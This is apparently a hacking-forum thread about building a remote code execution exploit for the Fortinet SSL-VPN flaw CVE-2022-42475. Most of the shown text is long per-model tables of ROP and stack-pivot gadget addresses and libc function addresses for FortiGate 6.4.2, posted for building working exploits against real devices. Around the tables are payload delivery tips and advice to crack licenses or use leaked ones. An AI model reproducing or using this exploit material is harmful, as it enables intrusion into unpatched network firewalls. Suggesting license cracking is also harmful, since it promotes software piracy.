Remote Producing a POC for CVE-2022-42475 (Fortinet RCE)

AFANX · 18.05.2023

проблемы с распаковкой bin.tar.xz
после монтирования .vmdk и распаковки rootfs нашел бинарь xz в директории /sbin . не понимаю, почему дает ошибку при запуске его.
readelf:

uname -a:
Linux 5.19.0-41-generic #42~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue Apr 18 17:40:00 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

хэлпаните плс.

AFANX · 18.05.2023

AFANX сказал(а):

проблемы с распаковкой bin.tar.xz
после монтирования .vmdk и распаковки rootfs нашел бинарь xz в директории /sbin . не понимаю, почему дает ошибку при запуске его.
readelf:
Посмотреть вложение 56945

uname -a:
Linux 5.19.0-41-generic #42~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue Apr 18 17:40:00 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

хэлпаните плс.

Нашел решение :

patchelf --set-interpreter /lib64/ld-linux-x86-64.so.2 sbin/xz

DoomSlayer2002 · 23.05.2023

tty сказал(а):

I was testing mostly before 6.0.3 because they patched the smartctl replacement trick after that. Getting the firmware files themselves is annoying.

I have access to all version, but they all trial - i assume the ssl vpn logic both the code and the feature is cut out from trial license?

tty · 25.05.2023

DoomSlayer2002 сказал(а):

I have access to all version, but they all trial - i assume the ssl vpn logic both the code and the feature is cut out from trial license?

It needs to be activated but you can crack it or find a leaked license without much trouble.

Premium · 01.06.2023

a bit of a mindfuck, isn't it. if anyone has a universal version of this - let me know, I'm willing to reward you

AFANX · 05.06.2023

еще один трабл. подскажите как запустить/активировать fnsysctl? команда просто не работает
например, такая команда: fnsysctl ls -la
ответ: unknown action 0

Viktor Baletov · 13.10.2023

Отлтично. Хотел бы проробывать но что но постоянно сыпет ошибками

mkhalilovx29 · 29.06.2024

Hi

When you read the writeups about this vuln , you will find out need stack pivot gadget for migrate rsp so you can replace your ROP chain

if anybody need i will share all stack pivot gadget addresses for Fortigate Version 6.4 ( all devices type with the software version match 6.4.x)

Код:

Version: 6.4.2
Device : FGT_1100E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162e87c
Version: 6.4.2
Device : FGT_1101E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c76cc
Version: 6.4.2
Device : FGT_1200D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016b2fdc
Version: 6.4.2
Device : FGT_140E
Version: 6.4.2
Device : FGT_1500D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016b3f6c
Version: 6.4.2
Device : FGT_1500DT
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016b3dfc
Version: 6.4.2
Device : FGT_2000E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c617c
Version: 6.4.2
Device : FGT_200E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162295c
Version: 6.4.2
Device : FGT_201E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016ba9ec
Version: 6.4.2
Device : FGT_2200E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162e89c
Version: 6.4.2
Device : FGT_2201E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c76dc
Version: 6.4.2
Device : FGT_2500E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c66dc
Version: 6.4.2
Device : FGT_3000D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016bfe1c
Version: 6.4.2
Device : FGT_300D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016b0bcc
Version: 6.4.2
Device : FGT_300E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162c06c
Version: 6.4.2
Device : FGT_301E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c4e6c
Version: 6.4.2
Device : FGT_3100D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016bfe1c
Version: 6.4.2
Device : FGT_3200D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c0c5c
Version: 6.4.2
Device : FGT_3300E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000163b86c
Version: 6.4.2
Device : FGT_3301E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016d46ac
Version: 6.4.2
Device : FGT_3400E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000163ba6c
Version: 6.4.2
Device : FGT_3401E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016d44ac
Version: 6.4.2
Device : FGT_3600E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000163ba6c
Version: 6.4.2
Device : FGT_3601E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016d44ac
Version: 6.4.2
Device : FGT_3700D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c0cbc
Version: 6.4.2
Device : FGT_3800D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c2d9c
Version: 6.4.2
Device : FGT_3810D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c0e6c
Version: 6.4.2
Device : FGT_3815D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c0dbc
Version: 6.4.2
Device : FGT_3960E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000163b11c
Version: 6.4.2
Device : FGT_3980E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000163b11c
Version: 6.4.2
Device : FGT_400D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x0000000001618bec
Version: 6.4.2
Device : FGT_400E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162c20c
Version: 6.4.2
Device : FGT_401E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c500c
Version: 6.4.2
Device : FGT_5001D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000015bab4c
Version: 6.4.2
Device : FGT_5001E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x0000000001532b6c
Version: 6.4.2
Device : FGT_5001E1
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000015ca6cc
Version: 6.4.2
Device : FGT_500D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016b0bbc
Version: 6.4.2
Device : FGT_500E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162bf7c
Version: 6.4.2
Device : FGT_501E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c4d8c
Version: 6.4.2
Device : FGT_600D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016b0c9c
Version: 6.4.2
Device : FGT_600E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162c11c
Version: 6.4.2
Device : FGT_601E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c4f2c

also remember its better to send your payloads over SSL socket not in https request format with curl or any other requesting library

happy hacking

mkhalilovx29 · 14.08.2024

mkhalilovx29 сказал(а):

Hi

When you read the writeups about this vuln , you will find out need stack pivot gadget for migrate rsp so you can replace your ROP chain

if anybody need i will share all stack pivot gadget addresses for Fortigate Version 6.4 ( all devices type with the software version match 6.4.x)

Код:

Version: 6.4.2
Device : FGT_1100E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162e87c
Version: 6.4.2
Device : FGT_1101E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c76cc
Version: 6.4.2
Device : FGT_1200D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016b2fdc
Version: 6.4.2
Device : FGT_140E
Version: 6.4.2
Device : FGT_1500D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016b3f6c
Version: 6.4.2
Device : FGT_1500DT
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016b3dfc
Version: 6.4.2
Device : FGT_2000E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c617c
Version: 6.4.2
Device : FGT_200E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162295c
Version: 6.4.2
Device : FGT_201E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016ba9ec
Version: 6.4.2
Device : FGT_2200E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162e89c
Version: 6.4.2
Device : FGT_2201E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c76dc
Version: 6.4.2
Device : FGT_2500E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c66dc
Version: 6.4.2
Device : FGT_3000D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016bfe1c
Version: 6.4.2
Device : FGT_300D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016b0bcc
Version: 6.4.2
Device : FGT_300E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162c06c
Version: 6.4.2
Device : FGT_301E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c4e6c
Version: 6.4.2
Device : FGT_3100D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016bfe1c
Version: 6.4.2
Device : FGT_3200D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c0c5c
Version: 6.4.2
Device : FGT_3300E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000163b86c
Version: 6.4.2
Device : FGT_3301E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016d46ac
Version: 6.4.2
Device : FGT_3400E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000163ba6c
Version: 6.4.2
Device : FGT_3401E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016d44ac
Version: 6.4.2
Device : FGT_3600E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000163ba6c
Version: 6.4.2
Device : FGT_3601E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016d44ac
Version: 6.4.2
Device : FGT_3700D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c0cbc
Version: 6.4.2
Device : FGT_3800D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c2d9c
Version: 6.4.2
Device : FGT_3810D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c0e6c
Version: 6.4.2
Device : FGT_3815D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c0dbc
Version: 6.4.2
Device : FGT_3960E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000163b11c
Version: 6.4.2
Device : FGT_3980E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000163b11c
Version: 6.4.2
Device : FGT_400D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x0000000001618bec
Version: 6.4.2
Device : FGT_400E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162c20c
Version: 6.4.2
Device : FGT_401E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c500c
Version: 6.4.2
Device : FGT_5001D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000015bab4c
Version: 6.4.2
Device : FGT_5001E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x0000000001532b6c
Version: 6.4.2
Device : FGT_5001E1
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000015ca6cc
Version: 6.4.2
Device : FGT_500D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016b0bbc
Version: 6.4.2
Device : FGT_500E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162bf7c
Version: 6.4.2
Device : FGT_501E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c4d8c
Version: 6.4.2
Device : FGT_600D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016b0c9c
Version: 6.4.2
Device : FGT_600E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162c11c
Version: 6.4.2
Device : FGT_601E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c4f2c

also remember its better to send your payloads over SSL socket not in https request format with curl or any other requesting library

happy hacking

hi all

in this post i will speak more about exploiting this vuln ( and also some hint for xortigate ) in real devices

as you may now fortigate have more than 65 product in each version and for every product have more than 35 software update firmware

also they have different kind of arch in their devices : x86 , arm32 and aarch64 for some models

most of devices now are x86 and arm32 in firmware arch but models like 40F , 60F , 100D have fsoc4 that use aarch64 architecture

each version of firmwares have their own address for functions and ropchains

so you need explore all 2800 (product * software version) so you can achieve code execution successfully

as you saw in last post i publish the stack pivot gadget for 6.4.x models

in this post i sent all functions address you will need and also rop addresses to use on you exploit for 6.4.2

Код:

Version: 6.4.2
Device : FGT_3810D
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x00000000023852d0
ret: 0x000000000056e466
pop rax ; ret: 0x0000000002db3a7a
and rax, rdi ; ret: 0x000000000232a6ba
pop rbx ; ret: 0x00000000017a0623
mov rdi, rax ; call rbx: 0x0000000001977751
pop rsi ; ret: 0x0000000001d6076c
pop rdx ; ret: 0x00000000027444c6
jmp rax: 0x000000000144ba34
jmp rsp: 0x0000000002e181d2
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c0e6c
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162130d
VMDK Results:
AES_set_decrypt_key: 429ba0:
mprotect: 429c80:
AES_cbc_encrypt: 42c110:
calloc: 42c310:

Version: 6.4.2
Device : FGT_3815D
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x0000000002385240
ret: 0x00000000016c97dd
pop rax ; ret: 0x0000000002db38fa
and rax, rdi ; ret: 0x000000000232a62a
pop rbx ; ret: 0x0000000002219bb0
mov rdi, rax ; call rbx: 0x00000000019776a1
pop rsi ; ret: 0x0000000001d606dc
pop rdx ; ret: 0x0000000002ded3de
jmp rax: 0x000000000144b984
jmp rsp: 0x0000000002e179a2
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c0dbc
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162125d
VMDK Results:
AES_set_decrypt_key: 429ba0:
mprotect: 429c80:
AES_cbc_encrypt: 42c110:
calloc: 42c310:

Version: 6.4.2
Device : FGT_3960E
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x00000000022aed30
ret: 0x0000000001acf0dd
pop rax ; ret: 0x0000000002fcdbb6
and rax, rdi ; ret: 0x000000000225411a
pop rbx ; ret: 0x00000000021436a0
mov rdi, rax ; call rbx: 0x00000000018cb271
pop rsi ; ret: 0x0000000001ca3a5c
pop rdx ; ret: 0x0000000000609a5d
jmp rax: 0x00000000013ca964
jmp rsp: 0x0000000002c9fbfa
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000163b11c
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000159b5bd
VMDK Results:
AES_set_decrypt_key: 427b40:
mprotect: 427c10:
AES_cbc_encrypt: 429f50:
calloc: 42a130:

Version: 6.4.2
Device : FGT_3980E
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x00000000022afc10
ret: 0x0000000001acf89d
pop rax ; ret: 0x0000000002d3acad
and rax, rdi ; ret: 0x0000000002254ffa
pop rbx ; ret: 0x0000000002144580
mov rdi, rax ; call rbx: 0x00000000018cb9f1
pop rsi ; ret: 0x0000000001ca489c
pop rdx ; ret: 0x0000000000609a5d
jmp rax: 0x00000000013ca964
jmp rsp: 0x0000000002ca0eb2
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000163b11c
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000159b5bd
VMDK Results:
AES_set_decrypt_key: 427b40:
mprotect: 427c10:
AES_cbc_encrypt: 429f50:
calloc: 42a130:

Version: 6.4.2
Device : FGT_400D
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x0000000002268990
ret: 0x0000000002e048b5
pop rax ; ret: 0x0000000002f99fa6
and rax, rdi ; ret: 0x000000000220dd7a
pop rbx ; ret: 0x0000000002110a4b
mov rdi, rax ; call rbx: 0x00000000019648f0
pop rsi ; ret: 0x0000000001c6f07c
pop rdx ; ret: 0x0000000002c21976
jmp rax: 0x00000000013a8564
jmp rsp: 0x0000000002c47532
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x0000000001618bec
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000157918d
VMDK Results:
AES_set_decrypt_key: 427b20:
mprotect: 427bf0:
AES_cbc_encrypt: 429f30:
calloc: 42a110:

Version: 6.4.2
Device : FGT_400E
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x0000000002285820
ret: 0x0000000001ab6b54
pop rax ; ret: 0x0000000002c0773a
and rax, rdi ; ret: 0x000000000222ac0a
pop rbx ; ret: 0x000000000211a190
mov rdi, rax ; call rbx: 0x00000000018b3bb1
pop rsi ; ret: 0x0000000001c86f0c
pop rdx ; ret: 0x0000000002c4697e
jmp rax: 0x00000000013bbb84
jmp rsp: 0x0000000002c6d67a
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162c20c
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000158c7ad
VMDK Results:
AES_set_decrypt_key: 427ae0:
mprotect: 427bb0:
AES_cbc_encrypt: 429ef0:
calloc: 42a0d0:

Version: 6.4.2
Device : FGT_401E
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x000000000236de50
ret: 0x0000000001e081ed
pop rax ; ret: 0x0000000002dfd49a
and rax, rdi ; ret: 0x000000000231323a
pop rbx ; ret: 0x00000000022027c0
mov rdi, rax ; call rbx: 0x00000000019731f1
pop rsi ; ret: 0x0000000001d560ac
pop rdx ; ret: 0x0000000002dd607e
jmp rax: 0x000000000144fd04
jmp rsp: 0x0000000002dfda4a
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c500c
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016255ad
VMDK Results:
AES_set_decrypt_key: 429ab0:
mprotect: 429b90:
AES_cbc_encrypt: 42c020:
calloc: 42c220:

Version: 6.4.2
Device : FGT_5001D
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x000000000220db90
ret: 0x0000000001a78ca4
pop rax ; ret: 0x000000000259e20a
and rax, rdi ; ret: 0x00000000021b2f7a
pop rbx ; ret: 0x00000000020a2500
mov rdi, rax ; call rbx: 0x000000000193b530
pop rsi ; ret: 0x0000000001c3e56c
pop rdx ; ret: 0x0000000002898638
jmp rax: 0x0000000001345624
jmp rsp: 0x0000000002c5b365
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000015bab4c
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000151afed
VMDK Results:
AES_set_decrypt_key: 429ba0:
mprotect: 429c80:
AES_cbc_encrypt: 42c110:
calloc: 42c310:

Version: 6.4.2
Device : FGT_5001E
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x0000000002134e90
ret: 0x00000000020ac859
pop rax ; ret: 0x0000000002cafbc4
and rax, rdi ; ret: 0x00000000020da27a
pop rbx ; ret: 0x0000000001fc9800
mov rdi, rax ; call rbx: 0x000000000188a1e0
pop rsi ; ret: 0x0000000001b7f14c
pop rdx ; ret: 0x0000000002a38521
jmp rax: 0x00000000012c22c4
jmp rsp: 0x0000000002ac2e0d
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x0000000001532b6c
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000149300d
VMDK Results:
AES_set_decrypt_key: 427b80:
mprotect: 427c50:
AES_cbc_encrypt: 429fa0:
calloc: 42a180:

Version: 6.4.2
Device : FGT_5001E1
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x000000000221ba30
ret: 0x00000000019e1996
pop rax ; ret: 0x00000000025af0ea
and rax, rdi ; ret: 0x00000000021c0e1a
pop rbx ; ret: 0x00000000020b03a0
mov rdi, rax ; call rbx: 0x0000000001e03bf0
pop rsi ; ret: 0x0000000001c4c86c
pop rdx ; ret: 0x0000000002c373d6
jmp rax: 0x00000000013551a4
jmp rsp: 0x0000000002c54cb1
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000015ca6cc
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000152ab6d
VMDK Results:
AES_set_decrypt_key: 429b50:
mprotect: 429c30:
AES_cbc_encrypt: 42c0d0:
calloc: 42c2d0:

Version: 6.4.2
Device : FGT_500D
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x0000000002350000
ret: 0x0000000001d408c9
pop rax ; ret: 0x000000000311bb36
and rax, rdi ; ret: 0x00000000022f53ea
pop rbx ; ret: 0x00000000021e4970
mov rdi, rax ; call rbx: 0x0000000001a258f0
pop rsi ; ret: 0x0000000001d3d27c
pop rdx ; ret: 0x0000000002db022e
jmp rax: 0x000000000143b8b4
jmp rsp: 0x0000000002dd701a
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016b0bbc
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000161115d
VMDK Results:
AES_set_decrypt_key: 429af0:
mprotect: 429bd0:
AES_cbc_encrypt: 42c060:
calloc: 42c260:

Version: 6.4.2
Device : FGT_500E
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x0000000002283ab0
ret: 0x0000000000b06dd8
pop rax ; ret: 0x0000000002c6a112
and rax, rdi ; ret: 0x0000000002228e9a
pop rbx ; ret: 0x0000000002118420
mov rdi, rax ; call rbx: 0x00000000018b3f21
pop rsi ; ret: 0x0000000001c8620c
pop rdx ; ret: 0x0000000002f3d2fc
jmp rax: 0x00000000013bb8f4
jmp rsp: 0x0000000002c6a582
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162bf7c
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000158c51d
VMDK Results:
AES_set_decrypt_key: 427aa0:
mprotect: 427b70:
AES_cbc_encrypt: 429eb0:
calloc: 42a090:

Version: 6.4.2
Device : FGT_501E
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
